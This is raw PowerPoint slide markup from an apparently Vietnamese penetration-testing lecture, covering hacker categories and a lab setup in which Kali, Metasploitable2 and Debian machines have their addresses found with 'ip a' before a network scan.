            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64809243-62BC-3478-FE39-B59C398C3EB5}"/>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68</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3190732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2FEAA-5109-6AE3-FD3D-362F10B96D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8846542-244A-468B-56E0-98FE7BEF724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BDFCF81D-53A3-C846-BE2B-413298AF421D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3.1	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Giới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Xâm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73105B96-7541-F1C7-FB27-7B5391A0629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69</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE05D986-8F35-8D60-FD60-8E08E0147544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1572186"/>
            <a:ext cx="8915400" cy="1131078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104139" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Máy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Debian-XSS-Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> a</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Kết quả cho biết địa chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>192.168.164.132/24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F81C8A2D-9FBE-DAA2-E90A-0096A41C2B0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="209963" y="2845750"/>
            <a:ext cx="8724073" cy="2827020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330631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95478"/>
            <a:ext cx="8455660" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>1.1.2. Phân loại đối tượng tấn công</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20"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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="1165351"/>
            <a:ext cx="8229600" cy="4362732"/>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Hacker Mũ Đen (Black Hat): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Có mục đích xấu, xâm nhập để đánh cắp thông tin, gây thiệt hại nhằm trục lợi cá nhân, tống tiền hoặc vì động cơ chính trị. Họ truy cập trái phép để "bẻ khóa" hoặc đánh cắp dữ liệu.</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Hacker Mũ Xám (Gray Hat): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Hoạt động ở ranh giới, có thể xâm nhập không phép nhưng không nhằm phá hoại, đôi khi đòi phí để đổi lấy thông tin lỗ hổng.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4110735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27840-1F7E-FEA2-B3DE-72712CE863A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4BE022E-62DB-28D0-A087-098183BC750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B3AC4BD8-62F8-6F05-3AC1-35F520F91376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377911" y="266700"/>
            <a:ext cx="8629650" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3.1	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Giới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Xâm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C010B6D-314A-4C48-FB48-EDDB96819F4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70</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC69A5C2-3872-39C6-0E20-CD23BDE482A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1572186"/>
            <a:ext cx="8915400" cy="113107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Máy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Metasploitable2-Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> a</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Kết quả cho biết địa chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>192.168.164.129/24.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BBED995-3DCC-D236-10A4-72193CAD3D19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="606369" y="2663912"/>
            <a:ext cx="8172734" cy="3047999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2436019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B7C3D-C5DF-B428-FC69-DEB051C8897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0B84CDF-A034-D05A-BE27-8056943E0EC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BB10B96E-8670-3EF9-5275-48BCF687C0F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71</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F27D61-F687-1DD7-1149-731677461347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476250" y="266700"/>
            <a:ext cx="8915400" cy="113107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Máy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kali-linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>qua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> a</a:t>
            </a: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Kết quả cho biết địa chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>192.168.164.128/24.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE5A00C8-A2ED-7322-4777-A782E4D2174F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1388253"/>
            <a:ext cx="5220335" cy="3924935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41DA13D-A9FF-CA74-4DDC-1523E52923E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5562600" y="1485900"/>
            <a:ext cx="32766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Sau </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đóquét</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dải</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>eth0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1466349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1392E-4CED-03A9-4EE9-D337BAD321C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929651C-CEB2-5F0C-B59C-04D75BAFA3C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7182F869-8675-7726-DA7A-46952FB69A0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72</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7926791F-CE56-8911-8D00-22678A37B7EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="266700"/>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a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
